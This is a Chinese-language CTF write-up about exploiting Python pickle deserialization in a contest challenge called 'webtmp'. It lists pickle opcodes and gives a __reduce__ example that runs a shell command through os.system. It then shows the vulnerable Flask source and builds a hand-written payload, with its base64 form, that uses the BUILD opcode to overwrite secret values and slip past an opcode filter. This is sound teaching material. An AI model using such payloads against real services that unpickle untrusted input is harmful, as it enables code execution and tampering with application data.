pickle反序列化--高校抗“疫”網絡安全分享賽


What is Pickle?

簡介

前幾天看到了p牛講的pickle反序列化的文章,比賽正好出了,給了一個實戰加深理解的機會。那么首先,我得知道pickle反序列化是什么東西。

pickle是一門棧語言,基於一個輕量的 PVM(Pickle Virtual Machine)。而PVM則主要包含指令處理器、stack和memo。

  • 指令處理器:處理OPcode和參數,對其進行解析。最后留在棧頂的值將作為反序列化對象返回。
  • stack:用來臨時存儲數據,參數和對象,由python的list實現,可理解為計算機的內存
  • memo:為PVM整個生命周期提供存儲,由python的dict實現,可理解為計算機的硬盤存儲

指令集

當前用於 pickle 的協議共有 5 種。使用的協議版本越高,讀取生成的 pickle 所需的 Python 版本就要越新。

  • v0 版協議是原始的 “人類可讀” 協議,並且向后兼容早期版本的 Python。
  • v1 版協議是較早的二進制格式,它也與早期版本的 Python 兼容。
  • v2 版協議是在 Python 2.3 中引入的。它為存儲 new-style class 提供了更高效的機制。欲了解有關第 2 版協議帶來的改進,請參閱 PEP 307
  • v3 版協議添加於 Python 3.0。它具有對 bytes 對象的顯式支持,且無法被 Python 2.x 打開。這是目前默認使用的協議,也是在要求與其他 Python 3 版本兼容時的推薦協議。
  • v4 版協議添加於 Python 3.4。它支持存儲非常大的對象,能存儲更多種類的對象,還包括一些針對數據格式的優化。有關第 4 版協議帶來改進的信息,請參閱 PEP 3154

指令集皆可在pickle源碼中查詢,下面給大家貼出來(比較長,可跳過

# Pickle opcodes.  See pickletools.py for extensive docs.  The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding

TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO          = b'\x80'  # identify pickle protocol
NEWOBJ         = b'\x81'  # build object by applying cls.__new__ to argtuple
EXT1           = b'\x82'  # push object from extension registry; 1-byte index
EXT2           = b'\x83'  # ditto, but 2-byte index
EXT4           = b'\x84'  # ditto, but 4-byte index
TUPLE1         = b'\x85'  # build 1-tuple from stack top
TUPLE2         = b'\x86'  # build 2-tuple from two topmost stack items
TUPLE3         = b'\x87'  # build 3-tuple from three topmost stack items
NEWTRUE        = b'\x88'  # push True
NEWFALSE       = b'\x89'  # push False
LONG1          = b'\x8a'  # push long from < 256 bytes
LONG4          = b'\x8b'  # push really big long

# Protocol 3 (Python 3.x)

BINBYTES       = b'B'   # push bytes; counted binary string argument
SHORT_BINBYTES = b'C'   #  "     "   ;    "      "       "      " < 256 bytes

# Protocol 4
SHORT_BINUNICODE = b'\x8c'  # push short string; UTF-8 length < 256 bytes
BINUNICODE8      = b'\x8d'  # push very long string
BINBYTES8        = b'\x8e'  # push very long bytes string
EMPTY_SET        = b'\x8f'  # push empty set on the stack
ADDITEMS         = b'\x90'  # modify set by adding topmost stack items
FROZENSET        = b'\x91'  # build frozenset from topmost stack items
NEWOBJ_EX        = b'\x92'  # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL     = b'\x93'  # same as GLOBAL but using names on the stacks
MEMOIZE          = b'\x94'  # store top of the stack in memo
FRAME            = b'\x95'  # indicate the beginning of a new frame

pickle序列化

pickle代碼主要依靠__reduce__魔術方法和手擼

  • __reduce__方法

    class exp(object):
        def __reduce__(self):
            s = r"""touch /tmp/success"""
            return (os.system, (s,))
        
    print(pickle.dumps(exp(), protocol=0))
    >>>b'cnt\nsystem\np0\n(Vtouch /tmp/success\np1\ntp2\nRp3\n.'
    
  • 手擼代碼,可以依據pickletools進行調試分析

    $python -m pickletools pickle.txt
        0: c    GLOBAL     'nt system' # 向棧頂壓入`posix.system`這個可執行對象
       11: p    PUT        0  # 將這個對象存儲到memo的第0個位置
       14: (    MARK   # 壓入一個元組的開始標志
       15: V        UNICODE    'touch /tmp/success'  # 壓入一個字符串
       35: p        PUT        1   # 將這個字符串存儲到memo的第1個位置
       38: t        TUPLE      (MARK at 14) # 將由剛壓入棧中的元素彈出,再將由這個元素組成的元組壓入棧中
       39: p    PUT        2  # 將這個元組存儲到memo的第2個位置
       42: R    REDUCE  # 從棧上彈出兩個元素,分別是可執行對象和元組,並執行,結果壓入棧中
       43: p    PUT        3 # 將棧頂的元素(也就是剛才執行的結果)存儲到memo的第3個位置
       46: .    STOP # 結束
    highest protocol among opcodes = 0 # v0協議
    
    >>>b'''cnt
    system
    p0
    (Vtouch /tmp/success
    p1
    tp2
    Rp3
    .'''
    

    注意:PVM 指令的書寫規范
    (1)操作碼是單字節的
    (2)帶參數的指令用換行符定界

題目分析

題目名字為webtmp,以下是題目源碼

import base64
import io
import sys
import pickle

from flask import Flask, Response, render_template, request
import secret

app = Flask(__name__)

class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __repr__(self):
        return f'Animal(name={self.name!r}, category={self.category!r})'

    def __eq__(self, other):
        return type(other) is Animal and self.name == other.name and self.category == other.category

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__':
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

def read(filename, encoding='utf-8'):
    with open(filename, 'r', encoding=encoding) as fin:
        return fin.read()

@app.route('/', methods=['GET', 'POST'])
def index():
    if request.args.get('source'):
        return Response(read(__file__), mimetype='text/plain')

    if request.method == 'POST':
        try:
            pickle_data = request.form.get('data')
            if b'R' in base64.b64decode(pickle_data):
                return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'
            else:
                result = restricted_loads(base64.b64decode(pickle_data))
                if type(result) is not Animal:
                    return 'Are you sure that is an animal???'
            correct = (result == Animal(secret.name, secret.category))
            return render_template('unpickle_result.html', result=result, pickle_data=pickle_data, giveflag=correct)
        except Exception as e:
            print(repr(e))
            return "Something wrong"

    sample_obj = Animal('giaogiao', 'Giao')
    pickle_data = base64.b64encode(pickle.dumps(sample_obj)).decode()
    return render_template('unpickle_page.html', sample_obj=sample_obj, pickle_data=pickle_data)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

很容易發現兩個關鍵點

  • pickle反序列化,但是find_class里面module限制了只能sys.module['__main__']
  • 當correct為true時,可以獲得flag

那么從判斷條件來說,我們需要反序列化出一個animal對象,其屬性分別等於secret中的name和category,然后便可以通過驗證,拿到flag

題目中secret.py沒有給出,不過可以不難猜出其大概長什么樣

# secret.py
name="xxx"
category="?????"
#test
a = sys.modules['__main__'].secret.name
print(a) # xxx

接下來就有幾種思路了

  • 獲取secret中的name和category值,然后用其創建animal對象
  • 覆蓋name和category的值,然后用自己覆蓋的值去創建animal對象

第一種方法,經過各種嘗試,無法實現__main__.secret.name的方式

那么考慮第二種思路,在翻閱pickle的各種協議文檔時,在協議2文檔中發現

可以通過反序列化更改其屬性值 對應操作碼為

BUILD          = b'b'   # call __setstate__ or __dict__.update()

這下思路就比較清晰了,先覆蓋屬性值,再生成animal對象,那么接下來就開始手擼pickle碼

開始構造

# 第一部分payload,傳入字典覆蓋屬性值
payload_1 = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sb.'''
# 第二部分payload,構造對象
exp = Animal("xxxxx","yyyyy")
payload_2 = pickle.dumps(exp)
#b'''\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
# 合並payload
payload = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sbc__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''

print(base64.b64encode(payload))
#Y19fbWFpbl9fCnNlY3JldAp9UyduYW1lJwpTJ3h4eHh4JwpzUydjYXRlZ29yeScKUyd5eXl5eScKc2JjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAeHh4eHhxBFgIAAAAY2F0ZWdvcnlxBVgFAAAAeXl5eXlxBnViLg==

Getflag

相關鏈接:


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM